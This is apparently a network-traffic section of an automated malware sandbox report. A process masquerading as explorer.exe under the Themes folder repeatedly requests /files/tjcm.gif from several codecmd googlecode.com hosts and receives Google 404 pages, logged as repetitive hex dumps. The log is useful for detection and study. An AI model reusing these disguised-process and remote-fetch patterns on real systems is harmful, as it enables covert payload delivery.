                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:57:53.466496944 CEST2653INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                17192.168.2.549867142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:57:55.710952997 CEST2653OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd03.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:57:55.737890005 CEST2655INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:57:55 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:57:55.737912893 CEST2655INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                18192.168.2.549868142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:57:58.168642998 CEST2656OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd01.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:57:58.197532892 CEST2657INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:57:58 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:57:58.197556973 CEST2658INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                19192.168.2.549871142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:58:00.906277895 CEST2672OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd02.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:58:00.932934999 CEST2673INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:00 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 